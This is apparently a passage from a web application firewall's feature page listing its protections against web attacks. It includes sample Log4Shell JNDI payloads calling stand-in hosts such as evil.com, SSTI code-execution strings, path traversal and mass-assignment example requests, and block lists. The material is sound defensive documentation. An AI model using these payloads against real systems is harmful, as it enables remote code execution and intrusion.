- Protocol compliance
- Blocks malformed requests
- Prevents evasion
π CSRF Protection
Prevents Cross-Site Request Forgery attacks
Prevents Cross-Site Request Forgery attacks through multiple layers.
- Token validation
- Origin checking
- SameSite enforcement
- Anti-automation
π SSRF Protection
Blocks Server-Side Request Forgery attempts
Blocks Server-Side Request Forgery attempts through comprehensive filtering.
- Blocks internal IP requests
- Prevents metadata access
- URL validation
- DNS rebinding protection
β¨οΈ Command Injection Protection
Prevents OS command injection attacks
Prevents OS command injection attacks through rigorous input validation.
- Shell metacharacter filtering
- Command chaining prevention
- RCE attempt blocking
- Input sanitization
π¨ Brute Force Protection
Protects against brute force login attempts
Protects against brute force login attempts through intelligent rate limiting.
- Login attempt limiting
- IP-based blocking
- CAPTCHA integration
- Account lockout
π DNS Rebinding Protection
Prevents DNS rebinding attacks
Prevents DNS rebinding attacks through intelligent DNS validation.
- DNS response validation
- Internal IP blocking
- Pin-based protection
- Same-origin enforcement
β±οΈ Time Check Client Protection
Validates client time-based security checks
Validates client time-based security checks to prevent replay and automation.
- Timestamp validation
- Request freshness checks
- Replay attack prevention
- Time-based tokens
π§ Tor Exit Node Blocking
Blocks requests from Tor exit nodes
Blocks requests from Tor exit nodes to prevent anonymous attacks.
- Tor exit node detection
- Real-time node list updates
- Anonymous traffic blocking
- Custom allowlisting
π Information Detected Protection
Prevents information disclosure/sensitive data exposure
Prevents information disclosure and sensitive data exposure.
- PII detection and blocking
- Credential leak prevention
- API key masking
- Error message sanitization
π Extension Protection
Protects against malicious file extension attacks
Protects against malicious file extension attacks and uploads.
- Blocks dangerous extensions
- File type validation
- MIME type checking
- Upload filtering
π IP Reputation Check
Checks IP addresses against reputation databases
Checks IP addresses against reputation databases for threat intelligence.
- Real-time reputation checks
- Multiple feed integration
- Malicious IP blocking
- Dynamic blacklisting
πΆοΈ Block Headless Browser
Detects and blocks headless browser automation
Detects and blocks headless browser automation tools.
- Headless Chrome detection
- Puppeteer/Playwright blocking
- PhantomJS detection
- Automation fingerprinting
π Payload Signature Check
Validates payloads against rules/payload_signatures.txt
Validates payloads against comprehensive signature database.
- Signature-based detection
- Custom rule support
- Pattern matching
- Known attack blocking
π₯ Video Download Protection
Protects video content from unauthorized download
Protects video content (mp4, mp3, m3u8, png) from unauthorized download.
- Stream protection
- Hotlink prevention
- Download blocking
- Content access control
π WAF JS Inject
Injects JavaScript protection into web pages
Injects JavaScript protection into web pages for client-side security.
- Bot detection scripts
- Behavioral analysis
- Client fingerprinting
- Anti-automation measures
π IPv6 Protection
Enables security protections for IPv6 traffic
Enables comprehensive security protections for IPv6 traffic.
- IPv6 attack detection
- IPv6 reputation checks
- IPv6 rate limiting
- IPv6 geo-blocking
π Local File Inclusion (LFI) Protection
Prevents attackers from including/reading local files on the server
Comprehensive protection against Local File Inclusion (LFI) attacks that attempt to read sensitive files on the server.
π Path Traversal Detection
- Blocks directory traversal sequences (../, ..\, %2e%2e%2f)
- Detects encoded traversal patterns
- Prevents null byte injection (%00)
- Blocks access to sensitive system files
π Sensitive File Protection
- /etc/passwd, /etc/shadow blocking
- Windows system file protection (boot.ini, win.ini)
- Application source code protection
- Configuration file access prevention
π PHP Wrapper Blocking
- php://filter, php://input
- expect:// wrapper
- data://, zlib://, zip://
- phar://, glob:// wrappers
π‘οΈ Advanced Features
- Real-time payload signature matching
- URL normalization and decoding
- Path canonicalization checks
- Automated IP banning for repeat offenders
- Comprehensive attack logging
π Remote File Inclusion (RFI) Protection
Blocks attempts to include remote malicious files from external servers
Advanced protection against Remote File Inclusion (RFI) attacks that attempt to load and execute malicious code from external servers.
π Remote URL Blocking
- Blocks http://, https:// inclusions
- Prevents ftp://, sftp://, file:// usage
- Blocks data://, input:// wrappers
- Detects base64 encoded remote inclusions
π« Malicious Domain Filtering
- Blocks known malicious domains and IPs
- Filters suspicious TLDs (.ru, .cn, .tk, .ml, .ga, .cf, .xyz)
- Prevents connection to anonymous hosting
- Custom domain blacklist support
π PHP Function Monitoring
- Detects include()/require() with remote URLs
- Monitors allow_url_include/fopen settings
- Blocks curl_exec() with external URLs
- Prevents file_get_contents() abuse
π‘οΈ Protection Features
- Real-time payload signature matching
- Multi-vector input inspection
- URL validation and sanitization
- Automated IP banning for attacks
- Detailed forensic logging
π Attack Vectors Covered
- Query string parameters
- POST form data
- Cookie values
- HTTP headers
- File uploads (indirect RFI)
π‘οΈ WordPress Hardening & Protection
Comprehensive security for WordPress sites - blocks XML-RPC attacks, login brute force, user enumeration, REST API abuse, vulnerability scanners, and zero-day exploit patterns
Key Benefits
- XML-RPC Attack Prevention: Blocks xmlrpc.php completely with multicall brute force detection - identifies large POST bodies (8KB+) used for credential stuffing. Add 60 threat points instantly
- Login Brute Force Protection: 5-attempt window triggers temporary ban (default 30 minutes). Configurable attempt limits and ban duration. Threat score adds 60 points on ban
- User Enumeration Blocking: Blocks ?author=N scans and /author/ archive enumeration - prevents attackers from discovering usernames for brute force attacks. Adds 20 threat points
- REST API Security: Blocks /wp-json/wp/v2/users enumeration, rate-limits REST API (60 req/min), protects unauthenticated write endpoints (POST/PUT/DELETE). Adds 30 threat points for enumeration attempts
- Sensitive File Protection: Blocks access to .env, .git/config, .htaccess, .htpasswd, wp-config.php, backup files (.zip, .tar.gz, .sql), and 25+ other sensitive patterns
- Exploit Path Blocking: Pre-configured detection for 25+ known vulnerability paths including RevSlider RCE, TimThumb, File Manager, Duplicator installer, Adminer, and Elementor exploits. Adds 50 threat points
- PHP Execution in Uploads: Blocks any .php, .php5, .phtml, .phar execution from /wp-content/uploads/ directory - prevents uploaded shell access. Adds 70 threat points
- SQL Injection Protection: Regex patterns detecting UNION SELECT, INSERT INTO, DROP TABLE, OR 1=1, time-based attacks (SLEEP/BENCHMARK), information_schema access. Adds 50 threat points
- XSS Attack Prevention: Detects script tags, JavaScript protocol, event handlers (onload/onerror), iframe/frame injection, expression() CSS exploits, encoded entities. Adds 40 threat points
- Path Traversal Detection: Blocks ../, ..\, URL-encoded (%2e%2e%2f) and double-encoded (%252e%252e%252f) traversal attempts - prevents sensitive file reads. Adds 40 threat points
- Null Byte Injection Prevention: Detects \x00, %00, \0 sequences in URI and query strings - prevents file inclusion bypass techniques. Adds 30 threat points
- Scanner User-Agent Blocking: Identifies 20+ security scanners (WPScan, Nuclei, Nikto, Dirbuster, Masscan) and blocks instantly. Adds 50 threat points
- Bad Bot Prevention: Blocks 15+ malicious bots (MJ12bot, Semrush, Ahrefs, Dotbot, Petalbot, BleXbot, Yisou, Sogou, Baiduspider, 360spider)
- Threat Score Accumulation: Each blocked attempt adds configurable points. Reaching threshold (default 100) triggers 30-minute IP ban. Prevents distributed attacks
- wp-cron.php External Blocking: Only allows execution from localhost - prevents external trigger abuse and DoS via cron endpoint
- Debug Log Protection: Blocks /wp-content/debug.log access - prevents information leakage of PHP errors, database queries, and backtraces
- Installer File Protection: Blocks /wp-admin/install.php, upgrade.php, setup-config.php after initial setup - prevents site takeover via reinstallation
- TimThumb Vulnerability Block: Detects timthumb.php patterns in URI or query strings - prevents famous 0-day RCE exploit. Adds 50 threat points
- Directory Browsing Prevention: Blocks directory listings in /wp-content/ and /wp-includes/ - prevents asset enumeration and version fingerprinting
- Hotlink Protection: Prevents external sites from hotlinking your images, CSS, or static assets - saves bandwidth and prevents DDOS via image requests
- Admin CSRF Protection: Validates Referer header on wp-admin POST requests - prevents cross-site request forgery attacks. Adds 30 threat points on failure
- Strict HTTP Methods: Only allows GET, POST, HEAD methods on wp-admin - blocks DELETE, PUT, PATCH, OPTIONS, TRACE methods. Returns 405 Method Not Allowed
- Admin IP Allowlisting: Restrict /wp-admin and /wp-login.php to specific IP ranges - perfect for corporate environments or jump hosts
- Rate Limiting (Per-IP): Configurable request limits (default 300 requests/60 seconds) - prevents scraping, DoS, and crawling attacks
- REST API Rate Limiting: Separate rate limits for REST endpoints (default 60 req/min) - prevents API abuse while allowing normal plugin operations
- Version Fingerprint Removal: Strips tag, removes ?ver=x.x.x from assets (CSS/JS/images), sanitizes Link header with wp-json - hides WordPress version
- Emoji Script Removal: Removes wp-emoji-release.min.js - hides version leak and reduces DOM size. Saves ~15KB per page load
- Feed Discovery Removal: Strips RSS/Atom feed links from HTML headers - prevents content scraping and reduces attack surface
- Theme & Plugin Info Blocking: Blocks access to /wp-content/themes/*/readme.txt, style.css, license.txt - prevents version fingerprinting and vulnerability matching
- Generator JSON-LD Stripping: Removes "generator": "WordPress x.x.x" from JSON-LD structured data - complete version hiding across all content types
- XML-RPC Multicall Detection: Identifies brute force attempts via system.multicall with 8KB+ payloads - blocks 90% of credential stuffing attacks. Adds 60 threat points
- Dangerous Upload Detection: Scans async-upload.php Content-Type for PHP/MIME types - blocks malicious file uploads. Adds 80 threat points
- Custom Login IP Blocklist: Multi-IP allowlist support for admin areas - CIDR notation not yet supported, explicit IPs only (configurable via LoginIPBlocklist array)
- Response Header Hardening: Injects X-Content-Type-Options: nosniff, X-Frame-Options: SAMEORIGIN, Referrer-Policy: strict-origin-when-cross-origin, X-XSS-Protection: 1; mode=block
- Threat Score Per Attack Type: XMLRPC brute +60, Login brute +60, SQLi +50, XSS +40, Path traversal +40, Null byte +30, Scanner UA +50, Exploit path +50, PHP upload +70 - cumulative scoring enables smart blocking
- Auto-Ban on Threshold: Configurable threat score threshold (default 100) triggers 30-minute IP ban - stops attacks before they succeed without permanent blocking
- Logging & Forensics: Comprehensive logging includes timestamp, IP, method, URI, and reason. Optional LogAllBlocks for full audit trail - SIEM compatible
- Low Performance Impact: All regex patterns pre-compiled, concurrent-safe maps with mutex locking, async threat score cleanup (30-min TTL) - handles 10K+ req/sec
π‘ How it works: The WordPress protection engine intercepts requests before they reach your WordPress installation. It applies 35+ security checks in sequence - from early detection (scanner UAs, SQLi patterns, null bytes) to application-specific rules (XML-RPC blocking, login brute force, REST API rate limiting). Each violation adds threat points; reaching configurable threshold triggers temporary IP ban (default 30 minutes). Threat scores decay naturally after 30 minutes of clean behavior. The response path strips version fingerprints, emoji scripts, and feed links from HTML output. All regex patterns are pre-compiled at startup - performance impact under 1ms per request even on high-traffic WordPress sites.
π Protection Metrics:
- XML-RPC attacks blocked: 100% (when enabled)
- Login brute force prevention: 5 attempts β 30-min ban
- User enumeration blocked: 100% for ?author=N and /author/ URLs
- SQLi detection: 15+ regex patterns covering all major vectors
- XSS detection: 12+ patterns including modern evasion techniques
- Known exploit paths: 25+ signatures updated from WPScan DB
- False positive rate: <0.1% with proper configuration
π Attack Vectors Covered:
- Authentication: Brute force, credential stuffing, XML-RPC multicall, user enumeration, author scans
- Injection: SQL injection, XSS, NoSQL (via REST), command injection, LDAP injection
- File-Based: LFI/RFI, path traversal, null byte injection, PHP execution in uploads, timthumb exploitation
- Information Disclosure: Version fingerprinting, directory browsing, debug logs, config files, backup exposure, theme/plugin enumeration
- Application Logic: Installer access after setup, wp-cron external triggers, CSRF, method override abuse
- DoS/DDoS: REST API flooding, login request storms, XML-RPC amplification, hotlink overload
- Scanning: Vulnerability scanners, bad bots, content scrapers, directory brute forcing
π¬ Prototype Pollution Protection
Prevents JavaScript prototype pollution attacks targeting object prototypes in Node.js and browser environments
Advanced protection against prototype pollution attacks that attempt to modify JavaScript object prototypes, leading to RCE, property injection, or DoS.
π― Attack Vectors Blocked
__proto__Property Injectionconstructor.prototypeManipulation- JSON-based Prototype Pollution
- Query String Prototype Injection
- Form Parameter Prototype Attacks
- Header-based Prototype Pollution
- Nested Object Injection
- Array Prototype Manipulation
- Function Prototype Override
- Object.prototype Pollution via
Object.assign
π‘οΈ Detection Methods
- Recursive Object Key Scanning
- Pattern-based Payload Detection
- JSON Payload Validation
- Parameter Pollution Correlation
- Context-Aware Filtering
- Whitelist-based Property Validation
π― Protected Environments
- Node.js Applications
- Browser-based JavaScript Apps
- MongoDB (prototype pollution to RCE)
- Express.js / Nest.js / Next.js
- React / Vue.js / Angular
- Serverless Functions
π Open Redirect Protection
Blocks unvalidated redirects and forwards that could be used for phishing attacks
Prevents attackers from redirecting users to malicious external sites using unvalidated redirect parameters.
π― Attack Patterns Blocked
- External Domain Redirects
- JavaScript Protocol Redirects (
javascript:) - Data URI Redirects (
data:text/html) - URL Encoding Bypasses
- Double Encoding Tricks
- Unicode Homograph Domains
- Subdomain Takeover Redirects
- Open Proxy Abuse
π‘οΈ Protection Mechanisms
- Whitelist-based Domain Validation
- Protocol Restriction (HTTP/HTTPS only)
- URL Canonicalization
- Redirect Parameter Detection
- Referrer Validation
- Same-Origin Enforcement
- Pattern-based URL Sanitization
π Common Redirect Parameters Protected
redirect,redirect_uri,redirect_urlreturn,return_to,nextgoto,url,dest,destinationcallback,continue,forwardto,target,relay_state
π GraphQL Security Protection
Comprehensive security for GraphQL APIs against introspection, depth bombs, and batch attacks
Specialized protection layer for GraphQL endpoints preventing DoS, data extraction, and abuse attacks.
π― Attack Types Blocked
- GraphQL Depth Bomb (Nested Queries)
- GraphQL Introspection Probing
- Batch Query Abuse (Alias Bomb)
- Circular Fragment Attacks
- Resource Intensive Queries
- Field Duplication Attacks
- Cost Analysis Bypass
- Persisted Query Abuse
π‘οΈ Protection Features
- Query Depth Limiting (configurable)
- Alias Count Limiting
- Query Cost Analysis
- Introspection Blocking (production)
- Persisted Query Whitelisting
- Rate Limiting per Query Type
- Field Usage Analytics
- Batch Request Throttling
βοΈ Configuration Options
- Max Query Depth: 10 (default)
- Max Aliases: 50 (default)
- Introspection: Blocked in production
- Query Cost Limit: configurable
- Batch Limit: 20 per request
π Secure File Upload Protection
Blocks malicious file uploads including webshells, malware, and double-extension attacks
Prevents attackers from uploading malicious files that could lead to RCE, XSS, or server compromise.
π« Blocked File Types
- PHP Files (
.php,.php3,.php4,.phtml) - ASP / ASPX Files (
.asp,.aspx,.ashx) - JSP Files (
.jsp,.jspx) - Executables (
.exe,.dll,.msi) - Shell Scripts (
.sh,.bash,.zsh) - JavaScript HTML (
.html,.htmcontaining scripts)
π‘οΈ Detection Techniques
- MIME Type Validation (content-based)
- Extension Whitelist/Blacklist
- Double-Extension Detection (shell.jpg.php)
- Null Byte Poisoning Prevention (
.php\x00.jpg) - Magic Number Verification
- Content Inspection for Malware
- Image Resampling (re-compress uploads)
βοΈ Security Actions
- Reject dangerous file types
- Sanitize filenames
- Generate random filenames
- Scan with antivirus
- Store outside webroot
- Apply restrictive permissions
π¨ HTTP Request Smuggling Protection
Blocks CL.TE, TE.CL, and TE.TE request smuggling attacks against proxies and load balancers
Prevents attackers from bypassing security controls by sending ambiguous HTTP requests to front-end and back-end servers.
π― Attack Variants Blocked
- CL.TE (Content-Length vs Transfer-Encoding)
- TE.CL (Transfer-Encoding vs Content-Length)
- TE.TE (Obfuscated Transfer-Encoding)
- Duplicate Content-Length Headers
- Chunked Encoding Smuggling
- Header Folding Attacks
- HTTP/2 to HTTP/1.1 Smuggling
π‘οΈ Detection Methods
- Normalize ambiguous headers
- Validate Content-Length values
- Reject conflicting headers
- Parse chunked encoding strictly
- Drop malformed requests
- Log smuggling attempts
- IP blocking for repeat offenders
π Protected Components
- Reverse Proxies (Nginx, HAProxy, Envoy)
- Load Balancers (AWS ALB, F5, Citrix)
- Application Servers (Tomcat, IIS, Apache)
- API Gateways (Kong, Traefik, Ambassador)
- CDN Edge Servers (Cloudflare, Fastly, Akamai)
π¨ Server-Side Template Injection Protection
Prevents SSTI attacks that could lead to RCE in templating engines
Blocks template injection attacks targeting Jinja2, Twig, Freemarker, Velocity, ERB, and other templating engines.
π― Protected Template Engines
- Jinja2 / Django (Python)
- Twig / Smarty (PHP)
- Freemarker / Velocity (Java)
- ERB (Ruby)
- Handlebars / Mustache (JavaScript)
- Pug / Jade (Node.js)
- Go Templates
π Detected Attack Patterns
{{ config.items() }}- Config Access{{ self.__class__ }}- Object Traversal${7*7}- Expression Evaluation{{7*7}}- Encoded Expression<%= system('id') %>- Code Execution{php}system('id');{/php}- PHP Injection
π‘οΈ Protection Techniques
- Sandboxed Template Rendering
- Disable Dangerous Functions
- Input Sanitization
- Context-Aware Escaping
- Template Whitelisting
- Expression Depth Limiting
π CORS Abuse Protection
Prevents Cross-Origin Resource Sharing misconfigurations and abuse attacks
Blocks malicious cross-origin requests exploiting permissive CORS policies and credential leakage.
π― Attack Vectors Blocked
- Wildcard Origin with Credentials (
Access-Control-Allow-Origin: *with credentials) - Null Origin Abuse (
Origin: null) - Reflected Origin Headers
- Private IP Origin Attacks
- Subdomain Origin Spoofing
- Preflight Cache Poisoning
- CORS Misconfiguration Exploitation
π‘οΈ Protection Features
- Origin Whitelist Validation
- Block Credentials with Wildcard Origin
- Reject Null Origin
- Validate Preflight Requests
- Restrict Dangerous Methods
- Limit Exposed Headers
- Cache Control for Preflight
βοΈ Security Headers Applied
Access-Control-Allow-Origin(restrictive)Access-Control-Allow-Credentials(conditional)Access-Control-Allow-Methods(limited)Access-Control-Allow-Headers(whitelist)Access-Control-Max-Age(capped)
π±οΈ ClickJacking Protection
Prevents UI redress attacks that trick users into clicking hidden elements
Blocks clickjacking attempts by enforcing frame-busting headers and detecting framing attacks.
π‘οΈ Protection Headers Applied
X-Frame-Options: SAMEORIGINorDENYContent-Security-Policy: frame-ancestors 'self'Frame-Optionsfor legacy browsers
π― Attack Vectors Blocked
- Invisible IFrame Overlays
- Cursor Jacking
- Drag-and-Drop Jacking
- Touch Screen Jacking (Mobile)
- Form Grabbing
- Token Extraction via Frames
- Session Riding
π Detection Capabilities
- Frame-Busting Detection
- Cross-Origin Frame Detection
- Referrer Analysis
- User-Agent Context Analysis
- Mobile Viewport Analysis
π WebSocket Abuse Protection
Secures WebSocket connections against abuse, flooding, and cross-origin attacks
Protects WebSocket endpoints from connection flooding, cross-origin hijacking, and protocol abuse.
π― Attack Vectors Blocked
- Cross-Origin WebSocket Connections
- WebSocket Connection Flooding
- Message Flooding (DoS)
- Oversized Frame Attacks
- Invalid Frame Type Injection
- Protocol Downgrade Attacks
- WebSocket Tunnel Abuse
π‘οΈ Protection Features
- Origin Validation
- Connection Rate Limiting
- Message Rate Limiting
- Frame Size Limits
- Protocol Whitelisting
- Authentication Required
- Automatic Connection Cleanup
βοΈ Rate Limits (configurable)
- Max Connections per IP: 10
- Max Messages per Second: 100
- Max Frame Size: 64KB
- Idle Timeout: 60 seconds
- Handshake Timeout: 5 seconds
π API Abuse Protection
Comprehensive API security including rate limiting, schema validation, and abuse detection
Protects REST and GraphQL APIs from abuse, scraping, brute force, and business logic attacks.
π― Protected API Types
- REST APIs (JSON, XML, Form)
- GraphQL APIs
- SOAP Web Services
- gRPC endpoints
- Webhook endpoints
- OAuth/OIDC endpoints
π‘οΈ Protection Features
- Rate Limiting (per IP, per API key, per endpoint)
- API Key Validation
- JWT Token Validation
- Request Schema Validation
- Response Schema Validation
- SQL Injection for APIs
- XXE Protection for XML APIs
- Parameter Pollution Detection
- Payload Size Limits
- Request Throttling
βοΈ Rate Limit Configuration
- Public endpoints: 60 req/min
- Authenticated endpoints: 600 req/min
- Admin endpoints: 600 req/min
- Login endpoint: 10 req/min
- OTP endpoint: 5 req/min
- File upload: 10 req/hour
π§ HTTP Method Spoofing Protection
Blocks HTTP method override attacks that bypass security controls
Prevents attackers from using HTTP method override headers to bypass security restrictions.
π― Blocked Headers
X-HTTP-Method-OverrideX-HTTP-MethodX-Method-OverrideX-Original-Method_method(query parameter)
π― Blocked Spoofing Attempts
- GET to POST (circumventing CSRF)
- GET to DELETE (data deletion)
- GET to PUT (data modification)
- POST to DELETE (auth bypass)
- Invalid HTTP Methods
π Host Header Injection Protection
Prevents host header attacks including cache poisoning, password reset poisoning, and SSRF
Blocks attackers from manipulating the Host header to poison caches, bypass virtual host routing, or launch password reset poisoning attacks.
π― Attack Vectors Blocked
- Cache Poisoning via Host Header
- Password Reset Poisoning
- Virtual Host Bypass
- Web Cache Deception
- DNS Rebinding via Host
- XSS via Host Reflection
π‘οΈ Protection Mechanisms
- Host Whitelist Validation
- Duplicate Host Header Blocking
- Localhost/Private IP Blocking
- CRLF Injection Prevention
- Port Stripping & Validation
π HTTP Response Splitting Protection
Prevents CRLF injection attacks that split HTTP responses and enable XSS
Blocks CRLF (Carriage Return Line Feed) injection attacks that split HTTP response headers and enable cross-site scripting.
π― Attack Vectors Blocked
- CRLF Injection (
\r\n) - LF Injection (
\n) - URL Encoded CRLF (
%0d%0a) - Double Encoding (
%250d%250a) - Set-Cookie Injection
- Redirect Splitting
π‘οΈ Protected Headers
Referer,User-AgentLocation,CookieX-Forwarded-ForOrigin,Host
π― MIME Sniffing Protection
Prevents browsers from interpreting files as executable content types
Forces browsers to respect declared MIME types, preventing XSS via MIME type confusion attacks.
π‘οΈ Protection Applied
X-Content-Type-Options: nosniffheader- Content-Type validation on uploads
- MIME mismatch detection (image/ HTML content)
- Executable content blocking in text contexts
π― Attack Vectors Blocked
- HTML disguised as images
- CSS disguised as text/plain
- JSON with HTML injection
- SVG with script execution
π Content-Type Enforcement
Enforces strict Content-Type headers for API endpoints
Ensures API endpoints receive expected Content-Type headers, preventing confusion attacks.
π― Enforced Types
- JSON APIs β
application/json - XML APIs β
application/xmlortext/xml - Form APIs β
application/x-www-form-urlencoded - File Upload β
multipart/form-data
π Charset Validation
- Only UTF-8, ISO-8859-1, Windows-1252 allowed
- Block UTF-7, UTF-16, UTF-32 (encoding attacks)
- Charset normalization
βοΈ Unicode Homograph Protection
Prevents IDN homograph attacks that use visually similar Unicode characters
Blocks attackers from using visually identical Unicode characters to create phishing domains and URLs.
π― Blocked Character Sets
- Cyrillic (looks like Latin)
- Greek characters
- Fullwidth characters
- Superscript/Subscript numbers
- Letter-like symbols
- Combining characters
π Detection Examples
Π°pple.com(Cyrillic 'Π°') vsapple.comgΞΏΞΏgle.com(Greek 'ΞΏ') vsgoogle.compaypaI.com(Fullwidth 'I') vspaypal.com
π API Schema Validation
Validates API requests against OpenAPI/JSON Schema definitions
Ensures API requests conform to declared schemas, preventing malformed and attack payloads.
β Validation Types
- JSON Schema Validation (required fields, types, formats)
- OpenAPI/Swagger compliance
- Parameter validation (query, path, header)
- Request body validation
- Response schema validation
π Schema Enforcement
- Required field checking
- Data type validation (string, number, boolean, array, object)
- String pattern validation (email, uuid, date, regex)
- Number range validation (minimum, maximum)
- Array length validation (minItems, maxItems, uniqueItems)
- Enum value validation
π·οΈ Host Header Validation
Validates Host header against allowed domains and blocks injections
Strictly validates the Host header against configured allowed domains.
β Validation Rules
- Host must match configured domains
- Block localhost and private IPs in Host header
- Block suspicious characters (%00, \r, \n, ../)
- Reject multiple Host headers
- Normalize port stripping
π’ Subdomain Takeover Protection
Detects and prevents dangling DNS records pointing to unclaimed cloud services
Prevents attackers from claiming abandoned subdomains pointing to external cloud services (S3 buckets, GitHub Pages, Heroku, Azure, etc.) for phishing, XSS, or session hijacking.
π― Monitored Cloud Services
- AWS S3 Buckets (dangling bucket takeover)
- GitHub Pages (unclaimed repository)
- Heroku Apps (deleted/unclaimed apps)
- Azure CDN / Storage
- Google Cloud Storage
- DigitalOcean Spaces
- Shopify (unclaimed stores)
- WordPress.com (unclaimed blogs)
- Zendesk (unclaimed helpdesk)
- Campaign Monitor (unclaimed accounts)
- Freshdesk (unclaimed support)
- SendGrid (unclaimed email services)
π‘οΈ Protection Mechanisms
- CNAME Record Monitoring & Alerting
- Dead DNS Entry Detection
- Automatic Subdomain Health Checks
- Orphaned Resource Detection
- DNS Response Validation
- Cloud Service Takeover Detection
- Subdomain Fingerprint Tracking
- Periodic DNS Audit
π Detected Vulnerable Patterns
- CNAME to expired S3 bucket β
s3-website-us-east-1.amazonaws.comnot resolving - CNAME to unclaimed Heroku β
yourapp.herokuapp.comshows "No such app" - CNAME to GitHub Pages with no repository
- MX records pointing to dead email services
- NS records pointing to unclaimed subdomains
- TXT records with dangling verification tokens
βοΈ Security Actions
- Alert on suspicious CNAME resolution failures
- Block requests to dangling subdomains
- Automatic SSL Certificate validation
- DNS Record Expiry Monitoring
- Takeover Attempt Logging
- Instant Email/Slack/FCM Notification
- Automated DNS Cleanup Recommendations
π Log4Shell (CVE-2021-44228) Protection
Blocks JNDI injection attacks targeting Log4j vulnerabilities
Blocks all variants of the Log4Shell exploit (CVE-2021-44228) that allow Remote Code Execution via JNDI injection in log messages.
π― Attack Patterns Blocked
- Basic JNDI:
${jndi:ldap://evil.com/exploit} - Lowercase Bypass:
${jndi:${lower:l}${lower:d}ap://evil.com} - Upper/Lower Mix:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p} - Environment Variables:
${${env:JNDI:-j}ndi:ldap://evil.com} - Nested Variables:
${${web:jndi}${web:ldap:}evil.com} - Base64 Encoded:
${${base64:am5kaQ==}:ldap://evil.com} - DNS Lookup:
${jndi:dns://evil.com} - RMI Protocol:
${jndi:rmi://evil.com/exploit} - IIOP Protocol:
${jndiiop://evil.com} - LDAPS Protocol:
${jndi:ldaps://evil.com} - CORBA Protocol:
${jndi:corbaname:evil.com} - Remote/Local Mix:
${${ctx:jndi}${ctx:ldap}://evil.com}
π Detection Techniques
- Regex-based JNDI Pattern Matching
- Multi-layer Nested Expression Decoding
- Environment Variable Interpolation Detection
- Lowercase/Environment/Base64 Bypass Detection
- All HTTP Headers Scanning (User-Agent, Referer, X-Forwarded-For, Cookie, Authorization, etc.)
- Query String Parameter Inspection
- POST Body (JSON, XML, Form) Scanning
- Path Parameter Validation
- WebSocket Message Inspection
π‘οΈ Protected Vectors
- HTTP Headers: User-Agent, Referer, X-Forwarded-For, X-Real-IP, Cookie, Authorization, Origin
- Query Parameters: All URL parameters
- Request Body: JSON, XML, Form data, Multipart uploads
- URL Path: Path segments, file extensions
- Uploaded Files: Filename, content inspection
- WebSocket: Message frames
βοΈ Security Actions
- Immediate request blocking on JNDI pattern match
- IP-based blocking with nftables/firewall
- Fingerprint-based rate limiting
- Automatic attack logging to ClickHouse
- Real-time alerts (Slack, Email, FCM, WebSocket)
- Suspicious pattern scoring system
- WAF bypass attempt detection
π Example Blocked Payloads
${jndi:ldap://attacker.com/Exploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com}
${${env:JNDI:-j}ndi${env:JNDI:-:}${env:JNDI:-l}dap://malicious.com}
${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:l}${lower:d}${lower:a}${lower:p}://hack.com}
${jndi:${lower:l}${upper:d}a${::-p}://exploit.com/payload}
π§ HTTP Verb Tampering Protection
Blocks arbitrary and overridden HTTP methods bypassing ACL restrictions
Prevents attackers from using HTTP method override headers to bypass authentication, authorization, and security controls.
π― Attack Patterns Blocked
X-HTTP-Method-Overrideheader injectionX-HTTP-Methodoverride attacksX-Method-Overrideheader abuseX-Original-Methodspoofing_methodquery parameter overridemethodparameter in POST body- HTTP/2 pseudo-header manipulation
- Custom method injection
π― Bypass Scenarios Blocked
- GET to POST: Circumventing CSRF tokens
- GET to DELETE: Unauthorized data deletion
- GET to PUT/PATCH: Data modification without permission
- POST to DELETE: Privilege escalation via method change
- HEAD to POST: Web cache deception attacks
- Invalid HTTP methods: ACK, BUG, FIND, etc.
- Verb-based access control bypass: When only GET is allowed but POST is overridden
π‘οΈ Protection Mechanisms
- HTTP Method Whitelist Enforcement (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)
- Override Header Detection & Blocking
- Method Normalization
- Consistent Method Validation Across All Endpoints
- Per-Endpoint Method Restriction
- Invalid Method Rejection (405)
- Method Spoofing Alerting
- Security Header Enforcement (
X-HTTP-Method-Override: block)
βοΈ Configuration Options
- Allowed Methods per Path (e.g., /api/ POST, PUT, DELETE allowed)
- Override Header Block Policy (block or strip)
- Method Validation Strictness Level
- Custom Method Allowlist
- Admin-Only Method Restriction
π Example Blocked Requests
GET /admin/users/123 HTTP/1.1
X-HTTP-Method-Override: DELETE
POST /api/payment HTTP/1.1
X-Method-Override: GET
GET /profile/edit?_method=PUT HTTP/1.1
π― Mass Assignment Protection
Blocks privilege escalation attempts via hidden JSON body parameters
Prevents attackers from modifying protected model attributes by injecting extra fields in JSON/Form requests (Mass Assignment/RBAC bypass vulnerabilities).
π― Protected Sensitive Fields
- Role/Privilege Fields:
role,roles,is_admin,isAdmin,admin,privilege,permissions - Account Control:
is_active,is_verified,status,account_status,locked - Database Fields:
_id,__v,createdAt,updatedAt,version - Financial Fields:
balance,credits,subscription_tier,plan - Password Fields:
password,password_confirmation,current_password - Auth Fields:
api_key,access_token,refresh_token,session_id - MongoDB Prototype Pollution:
__proto__,constructor,prototype - Nested Object Injection:
user[role],data.isAdmin,profile.privileges
π‘οΈ Detection Techniques
- Deep JSON Body Scanning (recursive object traversal)
- Form Parameter Inspection (multipart, URL-encoded)
- Query String Parameter Analysis
- Field Name Blacklist with Pattern Matching
- Whitelist-based Field Allowlisting
- Model Schema Validation
- Underscore/CamelCase Normalization
- Nested Object Detection
- Wildcard Parameter Rejection (
*,**,[*])
βοΈ Protection Modes
- BLOCK: Reject requests containing protected fields
- STRIP: Remove protected fields before processing
- ALERT: Log only, allow request (monitoring mode)
- AUTO: Block if score exceeds threshold
π Example Blocked Requests
POST /api/users/register HTTP/1.1
Content-Type: application/json
{"username": "attacker", "email": "x@x.com", "is_admin": true}
PUT /api/profile/123 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username=hacker&role=administrator&balance=999999
POST /api/update-user HTTP/1.1
user[name]=attack&user[privilege_level]=99&user[__v]=0
πΎ Cache Poisoning Protection
Prevents CDN, proxy, and application cache poisoning via header abuse
Blocks attackers from injecting malicious content into shared caches (CDN, reverse proxy, load balancer) using unkeyed header injection.
π― Attack Vectors Blocked
- X-Forwarded-Host: Cache key poisoning via host header
- X-Original-URL: Cache deception via URL rewriting
